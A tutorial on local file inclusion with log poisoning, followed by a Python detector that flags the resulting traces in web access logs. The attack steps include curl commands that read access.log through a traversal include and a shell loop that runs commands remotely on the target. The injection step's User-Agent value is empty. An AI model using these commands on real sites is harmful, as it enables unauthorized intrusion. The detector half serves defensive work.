1. Find an LFI (local file inclusion) vulnerability in the website.
2. Inject a web shell into a log file through the User-Agent header, the X-Forwarded-For header, or any other request field that the logger records.
# curl -s -A '' 'http://target.com/' -o /dev/null
3. Once the web shell is injected, try it with a simple command such as id, pwd or ls.
# curl -s 'http://target.com/include.php?page=../../../../../../var/log/access.log&cmd=id'
4. Now you are ready to get a remote shell that behaves as if you were working interactively in target.com's shell. (Run this in our shell.)
# while true; do read -p 'cmd>' cmd; cmd=$(php -r "echo urlencode('$cmd');"); curl -s "http://target.com/include.php?page=../../../../../../var/log/access.log&cmd=$cmd" ; done
5. The loop now requests "http://target.com/include.php?page=../../../../../../var/log/access.log&cmd=" and sends your commands continuously, as if you were on target.com.
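Seen from the defender's side, steps 2 to 5 leave two distinct traces in the access log: PHP code in a logged request field, and an include parameter that walks up to a log file. The following is an added example, not code from the original post: a Python check over constructed combined-format log lines. The log format, rule names, sample IPs and the benign PHP marker are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Assumed Apache/nginx "combined" format:
# ip - user [time] "request" status size "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>.*)"$')
PHP_TAG = re.compile(r'<\?(php|=)', re.I)           # PHP open tag in a logged field
TRAVERSAL = re.compile(r'\.\.[/\\]')                # ../ or ..\
LOG_TARGET = re.compile(r'/var/log/|(access|error)[._]log', re.I)

# Constructed sample lines (documentation IPs, benign PHP marker).
SAMPLE = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php /* constructed */ ?>"',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /include.php?page=../../../../../../var/log/access.log&cmd=id HTTP/1.1" 200 9000 "-" "curl/8.0"',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /include.php?page=%252e%252e%252f%252e%252e%252fvar%252flog%252faccess.log HTTP/1.1" 200 9000 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /include.php?page=about HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
]

def fully_decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded traversal (%252e%252e) is seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the set of findings for one access-log line."""
    m = LINE_RE.match(line)
    if not m:
        return {"unparsed"}
    findings = set()
    # Step 2: code planted in a field the logger records verbatim.
    if any(PHP_TAG.search(m[f]) for f in ("request", "referer", "agent")):
        findings.add("php-in-logged-field")
    # Steps 3-5: an include parameter that traverses up to a log file.
    req = fully_decode(m["request"])
    if TRAVERSAL.search(req) and LOG_TARGET.search(req):
        findings.add("lfi-to-log")
    return findings

def correlate(lines):
    """Union of findings per client IP; both findings together is the full chain."""
    by_ip = {}
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            by_ip.setdefault(m["ip"], set()).update(classify(line))
    return {ip: found for ip, found in by_ip.items() if found}
```

A client that shows both findings has completed the injection and the include. Either finding alone is still worth an alert, because the two requests can come from different addresses.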